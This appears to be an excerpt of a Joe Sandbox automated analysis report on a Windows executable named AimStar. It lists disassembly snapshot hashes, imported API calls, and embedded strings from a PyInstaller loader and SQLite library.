                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3458911817-0
                                                                                                                                                                                                                                          • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                          • Instruction ID: 72e60c5750dc642b1ba22b15bc68d6b8610a89e6cc0c9bc41c7db94711dd431d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90514026A0CA4286E710FF21D5875A9B768FB487A4FC48136EA4D537A6DF3CF448C760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                          • API String ID: 0-3175670447
                                                                                                                                                                                                                                          • Opcode ID: d297ce05d362dc23ee67dd2e9d60e0eea844db88850b10c762bc8624b7c4ec51
                                                                                                                                                                                                                                          • Instruction ID: 3732a3a023dbaf475a1914cab33dad312c5252841314231aa8dd4207a85c38a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d297ce05d362dc23ee67dd2e9d60e0eea844db88850b10c762bc8624b7c4ec51
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF1BB32A097869AE764DF25E08076E77A0FB84BD8F014035DA9D87B98DF3CE844CB54
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
                                                                                                                                                                                                                                          • Instruction ID: e078a8d4c24fb004a41411f7e8ca2a7b565cf4dfdb54653bf675078c03ad829f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8B0923F20D24884C301ABF14681A0C2E20E380E10F040051C3D102260E3AE441B8311
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45830
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45842
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45879
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4588B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458A4
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458B6
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458CF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458E1
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458FD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4590F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4592B
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4593D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45959
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4596B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45987
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45999
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459B5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459C7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                          • API String ID: 199729137-653951865
                                                                                                                                                                                                                                          • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                          • Instruction ID: 2f14c39f281cfab80866f9a7ba3ef68efb82656077ee610267cefe6c84663f76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85229138E0DF4BA1FA14BB55A8166B5A7ACAF05B71BC45136C85E42761FF3CB18CC260
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                          • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                          • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                          • Instruction ID: 2fc94ddd97f4e76d324f9d26f35836474d51017f45c972260123f0ae09ccbc4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91029228E0DF0B91EA15BB56A8179B5A7ADBF04775BC51132D81E423A4EF3CB58CC230
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF710F488A7,?,?,00000000,00007FF710F43CBB), ref: 00007FF710F4821C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                          • Instruction ID: b6d26ab03f23901deee33b40795c6571ce7bd6a2c21ff3994ccabad1336434ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74515235A1CE4251EB50BB25E853ABEA298AF947A0FC44431DE0EC27D5EE2CF54DC360
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                          • Opcode ID: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
                                                                                                                                                                                                                                          • Instruction ID: 7816bcef1fa70d460e86ca810e2f4f89878ad3b0ef38055e2c30d485185660e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1515C75B0CE4692EA10BB21A4029A9A3A8BF447B4FC44531EE0C87796DE3CF589C760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                          • API String ID: 0-3733955532
                                                                                                                                                                                                                                          • Opcode ID: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
                                                                                                                                                                                                                                          • Instruction ID: 4156505fd83588aa852e96104003bf0a70be2083c53d5b4a2ffbc592575a2686
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC02A3A1B4BA86A9EB59DB21A4543797BA1FF85BC1F084135CE4E07790DF3CE414C328
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A878B253
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A878B334
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                          • API String ID: 2830847230-875588658
                                                                                                                                                                                                                                          • Opcode ID: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
                                                                                                                                                                                                                                          • Instruction ID: 5bd91a1c2220e759783ccbd61d3bd1bc3eabbe0b4bccf0c2643d33adae490b35
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E1A122F4A646AAFB22CF64D4543BD27A0EB057C8F444136DE0E66A95DF3CE485C368
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Cannot add a UNIQUE column, xrefs: 00007FF8A87A792C
                                                                                                                                                                                                                                          • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FF8A87A7BA4
                                                                                                                                                                                                                                          • cannot add a STORED column, xrefs: 00007FF8A87A7B02
                                                                                                                                                                                                                                          • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FF8A87A799F
                                                                                                                                                                                                                                          • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FF8A87A797D
                                                                                                                                                                                                                                          • Cannot add a PRIMARY KEY column, xrefs: 00007FF8A87A7911
                                                                                                                                                                                                                                          • Cannot add a column with non-constant default, xrefs: 00007FF8A87A79F9
                                                                                                                                                                                                                                          • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FF8A87A7987, 00007FF8A87A7A03, 00007FF8A87A7B11
                                                                                                                                                                                                                                          • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FF8A87A7CEC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                          • API String ID: 2830847230-200680935
                                                                                                                                                                                                                                          • Opcode ID: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
                                                                                                                                                                                                                                          • Instruction ID: dd1aed7914c01dbf34e98dc4e86f1908639aef00dfb1540b7d28f5d820dd252b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E1CB32B4BB82A5EB659B15E1447B9A3A5FB80BC8F044035CE8D07B99DF3CE541C368
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: b7eca231638e3e1f5ba7d381d938b4126c3882f35701ec47ed7984308b3d99ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5351E836608BA186D6249F26A4181BAF7A1F798B61F404131EFDE83795DF3CE089D720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
